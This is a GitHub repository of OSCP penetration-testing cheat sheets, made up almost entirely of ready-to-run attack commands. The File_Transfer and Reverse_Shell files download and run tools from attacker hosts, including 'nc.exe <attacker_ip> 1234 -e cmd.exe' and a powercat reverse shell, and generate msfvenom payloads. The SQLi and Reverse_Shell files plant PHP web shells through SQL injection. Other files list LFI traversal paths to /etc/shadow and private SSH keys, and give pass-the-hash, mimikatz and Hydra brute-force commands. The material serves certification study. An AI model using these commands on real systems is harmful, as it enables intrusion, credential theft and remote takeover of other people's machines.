Full Code of omurugur/OSCP for AI

Repository: omurugur/OSCP
Branch: main
Commit: 84e748a21063
Files: 12
Total size: 26.8 KB

Directory structure:
gitextract_s2w0yhy0/

├── File_Transfer
├── Index_Detection
├── LFI
├── LICENSE
├── Password_Attack
├── Port_Scan
├── Port_Scan_By_Ports
├── README.md
├── Reverse_Shell
├── Road_Map
├── SQLi
└── Useful_Resources

================================================
FILE CONTENTS
================================================

================================================
FILE: File_Transfer
================================================
#With Curl
curl http://XX.XX.XX.XX/test.sh --output test.sh
------------------------
#Paste the following code to get nc in the victim:
echo open <attacker_ip> 21> ftp.txt
echo USER offsec>> ftp.txt
echo ftp>> ftp.txt
echo bin >> ftp.txt
echo GET nc.exe >> ftp.txt
echo bye >> ftp.txt
ftp -v -n -s:ftp.txt
nc.exe <attacker_ip> 1234 -e cmd.exe
------------------------
#Bounce port sanning
$ nc $ip 21
220 Femitter FTP Server ready.
USER anonymous
331 Password required for anonymous.
PASS foo
230 User anonymous logged in.
PORT 127,0,0,1,0,80
200 Port command successful.
LIST
------------------------
#Nice trick to share folders with RDP:
$ rdesktop (ip) -r disk:share=/home/bayo/store
------------------------
#With powershell:
$ powershell -c "(new-object System.Net.WebClient).DownloadFile('http://YOURIP:8000/b.exe','C:\Users\YOURUSER\Desktop\b.exe')"
------------------------
#Paste the following block in a command line to get a web client:
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
Run with:
$ cscript wget.vbs http://<attacker_ip>/nc.exe nc.exe


================================================
FILE: Index_Detection
================================================
#GOBUSTER
• gobuster dir -u http://XX.XX.XX.XX/Customer/Info -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k
------------------------
#with ssl GOBUSTER
• gobuster dir -u http://XX.XX.XX.XX -w /usr/share/wordlists/dirbuster -k 
------------------------
#DiRB
• dirb url -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
------------------------
#Davtest
• davtest -url http://XX.XX.XX.XX
------------------------
#WPScan
• wpscan -u https://omurugur.com/ --disable-tls-checks --enumerate p -- emumerate t --enumerate -u
• wpscan --url  https://omurugur.com/ --disable-tls-checks --api-tkoen <redacted>
• wpscan --url  https://omurugur.com/  -e ap 


================================================
FILE: LFI
================================================
#Useful LFI files (nulbyte)
../../../../../etc/passwd%00
....//....//....//....//....//etc/passwd%00
..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
------------------------
#Linux:
/etc/passwd
/etc/shadow
/etc/issue
/etc/group
/etc/hostname
/etc/ssh/ssh_config
/etc/ssh/sshd_config
/root/.ssh/id_rsa
/root/.ssh/authorized_keys
/home/user/.ssh/authorized_keys
/home/user/.ssh/id_rsa
------------------------
#Apache:
Configuration Files:
/etc/apache2/apache2.conf
/usr/local/etc/apache2/httpd.conf
/etc/httpd/conf/httpd.conf
------------------------
#Log Files:
Red Hat/CentOS/Fedora Linux-   /var/log/httpd/access_log
Debian/Ubuntu-   /var/log/apache2/access.log
FreeBSD-   /var/log/httpd-access.log
------------------------
#Generic:
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/apache2/access.log
/var/log/apache/error.log
------------------------
#MySql:
/var/lib/mysql/mysql/user.frm
/var/lib/mysql/mysql/user.MYD
/var/lib/mysql/mysql/user.MYI
------------------------
#Windows:
/boot.ini
/autoexec.bat
/windows/system32/drivers/etc/hosts
/windows/repair/SAM
/windows/panther/unattended.xml
/windows/panther/unattend/unattended.xml
------------------------


================================================
FILE: LICENSE
================================================
MIT License

Copyright (c) 2021 Ömür Uğur

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.


================================================
FILE: Password_Attack
================================================
#SSH Attack with THC-Hydra
• hydra -l kali -P /usr/share/wordlists/rockyou.txt ssh://127.0.0.1
------------------------
#Remote Desktop Protocol Attack with Crowbar
• crowbar -b rdp -s XX.XX.XX.XX/32 -u admin -C ~/password-file.txt -n 1
------------------------
#HTTP htaccess Attack with Medusa
•  medusa -h XX.XX.XX.XX -u admin -P /usr/share/wordlists/rockyou.txt -M http -m DIR:/admin
------------------------
#HTTP POST Attack with THC-Hydra
• hydra XX.XX.XX.XX http-form-post "/form/frontpage.php:user=admin&pass=^PASS^:INVALID LOGIN" -l admin -P /usr/share/wordlists/rockyou.txt -vV -f


================================================
FILE: Port_Scan
================================================
#Nmap
• nmap -sC -sV -O -iP
• nmap -p- --min-rate 10000 -oA scans/alltcp XX.XX.XX.XX
• nmap -p- -v <targetip>
• nmap -sT -sV -p- XX.XX.XX.XX -oA XX.XX.XX.XX
------------------------
#TCP Top 1000
• nmap -Pn -sC -sV -oA tcp -vv $ip
------------------------
#All TCP Ports:
• nmap -Pn -sC -sV -oA all -vv -p- $ip
------------------------
#UDP Top 100:
• nmap -Pn -sU --top-ports 100 -oA udp -vv $ip
• unicornscan -mU -v -I XX.XX.XX.XX
------------------------
#No Ping 
• nmap -sV -sC -O -Pn XX.XX.XX.XX
------------------------
#All Port 
• nmap -sV -sC -O -Pn  -p 1-65535 XX.XX.XX.XX
------------------------
#Nmap Detect And Write Stand-up Servers
• nmap -v -sn XX.XX.XX.XX-254 -oG upHost.txt 
------------------------
#UDP Scan
• nmap --top-ports 200 -sU -A XX.XX.XX.XX
------------------------
#With Netcat
• nc -nvv -w 1 -z XX.XX.XX.XX 3388-3390


================================================
FILE: Port_Scan_By_Ports
================================================
#SSH
• nmap -sV --script=ssh-* -p 22 XX.XX.XX.XX
------------------------
#SNMP
• sudo nmap -sU --open -p 161 XX.XX.XX.XX-254 -oG open-snmp.txt
• snmpwalk -c public -v1 -t 10 XX.XX.XX.XX
• snmp-check -t $ip -c public
• nmap -sU -p161 --script "snmp-*" $ip
------------------------
#Enumerating Windows Users
• snmpwalk -c public -v1 XX.XX.XX.XX 1.3.6.1.4.1.77.1.2.25
------------------------
#Enumerating Running Windows Processes
• snmpwalk -c public -v1 XX.XX.XX.XX 1.3.6.1.2.1.25.4.2.1.2
------------------------
#Enumerating Open TCP Ports
• snmpwalk -c public -v1 XX.XX.XX.XX 1.3.6.1.2.1.6.13.1.3
------------------------
#Enumerating Installed Software
• snmpwalk -c public -v1 XX.XX.XX.XX 1.3.6.1.2.1.25.6.3.1.2
------------------------
#SMTP
#telnet or netcat connection
• nc <targetip> 25
• VRFY root
------------------------
#Check for commands
• nmap -script smtp-commands.nse <targetip>
• nmap XX.XX.XX.XX -p 25 --script=smtp-*
• nc -nv XX.XX.XX.XX 25
------------------------
Command to check if a user exists
VRFY root
Command to ask the server if a user belongs to a mailing list
EXPN root
------------------------
#Always do users enumeration
• smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t $ip
• smtp-user-enum -M VRFY -U /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames-dup.txt  -t $ip
------------------------
#SMB
------------------------
#Enumerate Hostname - nmblookup -A $ip
• List Shares
• smbmap -H $ip
• echo exit | smbclient -L \\\\$ip
• nmap --script smb-enum-shares -p 139,445 $ip
• smbclient -N -L //XX.XX.XX.XX
------------------------
#Check Null Sessions
• smbmap -H $ip
• rpcclient -U "" -N $ip
• smbclient -N -L \\\\XX.XX.XX.XX\\
• smbclient \\\\$ip\\[share name]
• smbclient -L XX.XX.XX.XX--option='client min protocol=NT1'
• smbclient -L //XX.XX.XX.XX/ --option='client min protocol=NT1'
• smbclient \\\\XX.XX.XX.XX\\'bob share' --option='client min protocol=NT1'
------------------------
#Check for Vulnerabilities - 
nmap --script smb-vuln* -p 139,445 $ip
------------------------
#Overall Scan - 
enum4linux -a $ip
------------------------
#Manual Inspection
• smbver.sh $ip (port)
------------------------
#rpcclient
• rpcclient -U '' $ip
• Password:
• rpcclient $> srvinfo # operating system version
• rpcclient $> netshareenumall # enumerate all shares and its paths
• rpcclient $> enumdomusers # enumerate usernames defined on the server
• rpcclient $> getdompwinfo # smb password policy configured on the server
------------------------
#CrackMapExe
• crackmapexec -u 'guest' -p '' --shares $ip
• crackmapexec -u 'guest' -p '' --rid-brute 4000 $ip
• crackmapexec -u 'guest' -p '' --users $ip
• crackmapexec smb XX.XX.XX.XX/24 -u Administrator -p P@ssw0rd
• crackmapexec smb XX.XX.XX.XX/24 -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B
• crackmapexec -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B -M mimikatz XX.XX.XX.XX/24
• crackmapexec -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B -x whoami $ip
• crackmapexec -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B --exec-method smbexec -x whoami $ip# reliable pth code execution
------------------------
#smbmap
• smbmap -u '' -p '' -H $ip # similar to crackmapexec --shares
• smbmap -u guest -p '' -H $ip
• smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip
• smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -r # list top level dir
• smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -R # list everything recursively
• smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -s wwwroot -R -A '.*' # download everything recursively in the wwwroot share to /usr/share/smbmap. great when smbclient doesnt work
• smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -x whoami # no work
------------------------
# Share List:
• smbclient --list <targetip>
• smbclient -L <targetip>
• smbclient -L //XX.XX.XX.XX
------------------------
# SMB Client:
• smbclient //XX.XX.XX.XX/pathname
• smbclient -L  //XX.XX.XX.XX
------------------------
# SMB Map:
• smbmap -H XX.XX.XX.XX
• smbmap -H XX.XX.XX.XX -R  --depth 5
• smbmap -H htb.local -u <username> -p <password>
------------------------
# Check SMB vulnerabilities:
• nmap --script=smb-check-vulns.nse <targetip> -p445
• nmap --script vuln XX.XX.XX.XX -p445
• nmap --script "vuln" <targetip> -p139,445
------------------------
# basic nmap scripts to enumerate shares and OS discovery
• nmap -p 139,445 XX.XX.XX.XX/24 --script smb-enum-shares.nse smb-os-discovery.nse
• nmap --script smb-enum-shares.nse -p445 XX.XX.XX.XX
------------------------
# Connect using Username
• smbclient -L <targetip> -U username -p 445
------------------------
# Connect to Shares
• smbclient \\\\<targetip>\\ShareName
• smbclient \\\\<targetip>\\ShareName -U User_name
------------------------
# enumarete with smb-shares, -a “do everything” option
• enum4linux -a XX.XX.XX.XX
• enum4linux -i XX.XX.XX.XX
------------------------
# learn the machine name and then enumerate with smbclient
• nmblookup -A XX.XX.XX.XX
• smbclient -L <server_name> -I XX.XX.XX.XX
------------------------
# DNS ENUM
• dnsenum zonetransfer.me
------------------------
# DNS RECON
• dnsrecon -d okmurugur.com -t axfr
• dnsrecon -d XX.XX.XX.XX -r XX.XX.XX.XX/8
------------------------
# DNS ENUMERATiON
• host www.okmurugur.com
• host -t mx okmurugur.com
• host -t txt okmurugur.com
------------------------
# DiG
• dig axfr  @XX.XX.XX.XX okmurugur.com


================================================
FILE: README.md
================================================
<div class="Box-body">
        <article class="markdown-body entry-content p-5" itemprop="text"><h1><a id="user-content-birdwatcher" class="anchor" aria-hidden="true" href="#CEH_v10_Dumps"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a>OSCP ( Offensive Security Certified Professional )</h1>
<p>
        



<p>
          <a target="_blank" rel="noopener noreferrer" href="https://opensource.org/licenses/MIT"><img src="https://camo.githubusercontent.com/5d454a1a25b3f3d16a6a6301933cf1d1471704da/68747470733a2f2f696d672e736869656c64732e696f2f6769746875622f6c6963656e73652f616e74692d64646f732f416e74692d44444f53" data-canonical-src="https://opensource.org/licenses/MIT" style="max-width:100%;"></a>
        <a target="_blank" rel="noopener noreferrer" href="https://camo.githubusercontent.com/13c4e50d88df7178ae1882a203ed57b641674f94/68747470733a2f2f63646e2e7261776769742e636f6d2f73696e647265736f726875732f617765736f6d652f643733303566333864323966656437386661383536353265336136336531353464643865383832392f6d656469612f62616467652e737667"><img src="https://camo.githubusercontent.com/13c4e50d88df7178ae1882a203ed57b641674f94/68747470733a2f2f63646e2e7261776769742e636f6d2f73696e647265736f726875732f617765736f6d652f643733303566333864323966656437386661383536353265336136336531353464643865383832392f6d656469612f62616467652e737667" data-canonical-src="https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg" style="max-width:100%;"></a> 
           <a target="_blank" rel="noopener noreferrer" href="https://liberapay.com/slife/donate"><img alt="Donate using Liberapay" src="https://liberapay.com/assets/widgets/donate.svg" data-canonical-src="https://liberapay.com/slife/donate" style="max-width:50%;"></a>
        
<b>Overview:</b>

Penetration Testing with Kali Linux (PEN-200) is the foundational course at Offensive Security. Those new to OffSec or penetration testing should start here.

This online ethical hacking course is self-paced. It introduces penetration testing tools and techniques via hands-on experience. PEN-200 trains not only the skills, but also the mindset required to be a successful penetration tester. Students who complete the course and pass the exam earn the coveted Offensive Security Certified Professional (OSCP) certification.

To learn more about the modules updated in 2020 and get answers to frequently asked questions, see the announcement blog post.
       
      


You can find my experience on the OSCP certification  exam that I entered in 2021 and succeeded on my <a href="https://www.justsecnow.com/oscp-offensive-security-certified-professional-inceleme-ve-sinavi/">site</a>.  I wish success to the friends who will take the exam.


<h2><a id="user-content-configuration" class="anchor" aria-hidden="true" href="#References"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a>References</h2>

•	https://www.offensive-security.com/pwk-oscp/
</p>


<h2><a id="user-content-configuration" class="anchor" aria-hidden="true" href="#Download"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a>Download</h2>

<h5>Cloning an Existing Repository ( Clone with HTTPS )</h5>
<pre><code>
root@slife:~# git clone https://github.com/omurugur/OSCP.git
</code></pre>
<h5>Cloning an Existing Repository ( Clone with SSH )</h5>
<pre><code>
root@slife:~# git clone git@github.com:omurugur/OSCP.git
</code></pre>


<h2><a id="user-content-configuration" class="anchor" aria-hidden="true" href="#Contact"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a>Contact</h2>

<h5>Mail : omurugur12@gmail.com </h5>

<h5>Linkedin  : https://www.linkedin.com/in/omurugur-sibergüvenlik/ </h5>

<h5>GitHub  : https://github.com/omurugur </h5>

<h5>Twitter  : https://twitter.com/omurugurrr </h5>

<h5>Medium  : https://omurugur.medium.com/ </h5>

<h5>Donate!</h5>
</p>
Support the authors:





================================================
FILE: Reverse_Shell
================================================
# Interactive TTY Shell
• python -c 'import pty; pty.spawn("/bin/sh")'
• python -c 'import pty;pty.spawn("/bin/bash")'
• python -c 'import pty; pty.spawn("/bin/bash")'
• /usr/bin/script -qc /bin/bash /dev/null
------------------------
# With Powershell 
• powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://XX.XX.XX.XX/powercat.ps1');powercat -c XX.XX.XX.XX -p 9090 -e cmd"
------------------------
# Reverse Shell 
#Linux
•msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=443 -f elf > shell.elf
# PHP
•msfvenom -p php/meterpreter_reverse_tcp LHOST=<attacker_ip> LPORT=443 -f raw > shell.php
# ASP
•msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.119.216 LPORT=443 -f asp > shell.asp
# WAR
•msfvenom -p java/jsp_shell_reverse_tcp LHOST=<attacker_ip> LPORT=443 -f war > shell.war
# JSP
•msfvenom -p java/jsp_shell_reverse_tcp LHOST=<attacker_ip> LPORT=443 -f raw > shell.jsp
# Exe
•msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=445 -f exe -o shell_reverse.exe
# ASPX
•msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=443 -f aspx > shell.aspx
# ASPX-x64 
•msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker_ip> LPORT=1234 -f aspx > 4.aspx
------------------------
#Shell From SQL Injection
•windows
?id=1 union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6,7,8,9 into OUTFILE 'c:/xampp/htdocs/cmd.php'
•linux
?id=1 union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6,7,8,9 into OUTFILE '/var/www/html/cmd.php'


================================================
FILE: Road_Map
================================================

Network Scanning

Service Scanning

    WebApp
      ☐   Nikto 
      ☐   dirb
      ☐   dirbuster
      ☐   wpscan
      ☐   dotdotpwn
      ☐   view source 
      ☐   davtest\cadevar
      ☐   droopscan
      ☐   joomscan
      ☐   LFI\RFI Test
      ☐   SQL ınjectıon
      ☐   Default şifre arama 
      
    Linux\Windows
      ☒   snmpwalk -c public -v1 ipaddress 1
      ☐   smbclient -L //ipaddress
      ☐   showmount -e ipaddress port
      ☐   rpcinfo
      ☐   Enum4Linux
    
    Anything Else
      ☐   nmap scripts (locate *nse* | grep servicename)
      ☐   hydra
      ☐   MSF Aux Modules
      ☐   Download the software

Exploitation
   ☐   Gather Version Numbes
   ☐   Searchsploit
   ☐   Default Creds
   ☐   Creds Previously Gathered
   ☐   Download the software

Post Exploitation

    Linux
      ☐   linux-local-enum.sh
      ☐   linuxprivchecker.py
      ☐   linux-exploit-suggestor.sh
      ☐   unix-privesc-check.py

    Windows
      ☐   wpc.exe
      ☐   windows-exploit-suggestor.py
      ☐   windows_privesc_check.py
      ☐  windows-privesc-check2.exe

Priv Escalation
   ☐  acesss internal services (portfwd)
   ☐  add account

Windows
   ☐  List of exploits

Linux
   ☐  sudo su 
   ☐  KernelDB
   ☐  Searchsploit

Final
   ☐  Screenshot of IPConfig\WhoamI
   ☐  Copy proof.txt
   ☐  Dump hashes 
   ☐  Dump SSH Keys
   ☐  Delete files


================================================
FILE: SQLi
================================================
#sqlmap
☐ sqlmap -r name.txt --batch --force-ssl
☐ sqlmap -r name.txt --dbms mysql --technique=U --dump  --batch
☐ sqlmap -r name.txt --dbms mysql --technique=U --users
☐ sqlmap -r name.txt --dbms mysql --technique=U  --passwords
☐ sqlmap -u http://XX.XX.XX.XX/tst.php?id=1 -p "id" --dbms=mysql --dump
☐ sqlmap -u http://XX.XX.XX.XX/tst.php?id=1 -p "id" --dbms=mysql --os shel
------------------------



================================================
FILE: Useful_Resources
================================================
Blog :
My experience with the OSCP certification — Security Café
PWK and OSCP my experience | Fady Osman’s Technical Blog
Offensive Security’s PWB and OSCP — My Experience — Security SiftSecurity Sift
Penetration Testing With Backtrack — OSCP — Things all the hacking
Pentesting With BackTrack (PWB) + Offensive Security Certified Professional (OSCP)
OSCP Course and Exam Review — RCE Security
Try Harder! An OSCP Review.Blog of Jason Bernier
Pentest Tips and Tricks — EK
Open Security Research: Using Mimikatz to Dump Passwords!
Hacking/OSCP cheatsheet :: Ceso Adventures
The CORE Hacking Course — YouTube
Eğlence ve Kâr için bir web.config Dosyası Yükleme | Soroush Dalili (@irsdl) — سروش دلیلی
NetSecFocus Trophy Room — Google Drive
Enumeration :
oscp/linux-template.md at master · xapax/oscp
oscp/windows-template.md at master · xapax/oscp
CTF Series : Vulnerable Machines — tech.bitvijays.com
PWK Notes: SMB Enumeration Checklist [Updated] | 0xdf hacks stuff
nmapAutomator/nmapAutomator.sh at master · 21y4d/nmapAutomator
Privilege_Escalation_Windows:
Windows Privilege Escalation Guide
FuzzySecurity | Windows Privilege Escalation Fundamentals
Windows elevation of privileges
(1) Windows Privilege Escalation — AlwaysInstallElevated — YouTube
PowerSploit/PowerUp.ps1 at master · PowerShellMafia/PowerSploit
WindowsEnum/WindowsEnum.ps1 at master · absolomb/WindowsEnum
Windows-Exploit-Suggester/windows-exploit-suggester.py at master · AonCyberLabs/Windows-Exploit-Suggester
Windows Privilege Escalation Methods for Pentesters — Pentest Blog
FuzzySecurity | Windows Privilege Escalation Fundamentals
Windows Local Privilege Escalation — HackTricks
GhostPack/SharpUp: SharpUp is a C# port of various PowerUp functionality.
Ghostpack-CompiledBinaries/SharpUp.exe at master · r3motecontrol/Ghostpack-CompiledBinaries
https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1
GhostPack/Seatbelt: Seatbelt is a C# project that performs a number of security oriented host-survey “safety checks” relevant from both offensive and defensive security perspectives.
Ghostpack-CompiledBinaries/Seatbelt.exe at master · r3motecontrol/Ghostpack-CompiledBinaries
privilege-escalation-awesome-scripts-suite/winPEAS at master · carlospolop/privilege-escalation-awesome-scripts-suite
bitsadmin/wesng: Windows Exploit Suggester — Next Generation
rasta-mouse/Watson: Enumerate missing KBs and suggest exploits for useful Privilege Escalation vulnerabilities
SecWiki/windows-kernel-exploits: windows-kernel-exploits Windows平台提权漏洞集合
Neohapsis/creddump7
juicy-potato/README.md at master · ohpe/juicy-potato
antonioCoco/RoguePotato: Another Windows Local Privilege Escalation from Service Account to System
itm4n/PrintSpoofer: Abusing Impersonation Privileges on Windows 10 and Server 2019
Privilege_Escalation_Linux:
sagishahar/lpeworkshop: Windows / Linux Local Privilege Escalation Workshop
Linux elevation of privileges
LinEnum/LinEnum.sh at master · rebootuser/LinEnum
Basic Linux Privilege Escalation
Linux Privilege Escalation Scripts
Linux Privilege Escalation — HackTricks
diego-treitos/linux-smart-enumeration: Linux enumeration tool for pentesting and CTFs with verbosity levels
Cronjobs’u Kullanarak Linux Ayrıcalık Yükselmesi
rebootuser/LinEnum: Scripted Local Linux Enumeration & Privilege Escalation Checks
linted/linuxprivchecker: linuxprivchecker.py — a Linux Privilege Escalation Check Script
AlessandroZ/BeRoot: Privilege Escalation Project — Windows / Linux / Mac
unix-privesc-check | pentestmonkey
jondonas/linux-exploit-suggester-2: Next-Generation Linux Kernel Exploit Suggester
Linux Sızma Testlerinde Hak Yükseltme Yöntemleri | SİBER GÜVENLİK PORTALİ
Reverse_Shell:
reverseshell | pentestmonkey
netcat 1.11 for Win32/Win64
Upgrading Simple Shells to Fully Interactive TTYs — ropnop blog
Spawning a TTY Shell
Reverse Shell Cheat Sheet | pentestmonkey
Reverse Shell Cheat Sheet
Remote-File-Inclusion-Shell/knock.txt at master · namansahore/Remote-File-Inclusion-Shell
BOF:
PWK/OSCP — Stack Buffer Overflow Practice — vortex’s blog
Seattle Lab Mail (SLmail) 5.5 Üzerinde Stack Tabanlı Bellek Taşma Zafiyetinin İstismarı | SİBER GÜVENLİK PORTALİ
(1) Buffer Overflow Exploitation (Minishare & FreeFloat) — YouTube
justinsteven/dostackbufferoverflowgood
jessekurrus/slmailsploits: Several Python scripts used to fuzz and exploit SLmail. These are meant to supplement the Kali Linux Hands-on Pentesting Udemy course.
(2) Immunity Debugger Overview — YouTube
Stack Based Buffer Overflow in Win 32 Platform: The Basics
Stack Buffer Overflow Zafiyeti — PCMan FTP Server 2.0.7 | Ahmet GÜREL
Zero Day Zen Garden: Windows Exploit Development — Part 5 [Return Oriented Programming Chains]
Zero Day Zen Garden: Windows Exploit Development — Part 4 [Overwriting SEH with Buffer Overflows]
Buffer Overflow — Easy Chat Server 3.1 — OnSecurity
Buffer Overflow Exploit Geliştirme ~ BTRiskBlog Pentest, ISO27001 ve BT Denetimi Hakkında Herşey
Coalfire — The Basics of Exploit Development 1: Win32 Buffer Overflows
Coalfire — Coalfire Blog
Coalfire — Coalfire Blog
Customized Mail Server Software Buffer Overflow on Windows Server 2008 | by Rudy Samuel Pardosi | Medium
Vulnserver Kullanarak Basit Bir Arabellek Taşması | Z3R0th tarafından | Orta
Bağışıklık Hata Ayıklayıcısı ve Mona.py ile Kötü Karakterler Bulma — Bulb Security
minishare 1.4.1 exploit — YouTube
SQLI:
SQL-Injections · Security — My notepad
44348-error-based-sql-injection-in-order-by-clause-(mssql).pdf
Full MSSQL Injection PWNage
MSSQL Practical Injection Cheat Sheet — Perspective Risk
SQL Injection Cheat Sheet | Netsparker
Öner KAYA: Gelişmiş SQL Enjeksiyon İşlemleri (Advanced Sql Injection)
Red Team Tales 0x01: From MSSQL to RCE — Tarlogic Security — Cyber Security and Ethical hacking
SQL Injection Cheat Sheet | Bhanu Notes
SQL-Injections · Total OSCP Guide
SQL Tutorial
LFI:
Hack The Box — Poison Writeup w/o Metasploit | by Rana Khalil | The Startup | Medium
(7) HackTheBox — Poison — YouTube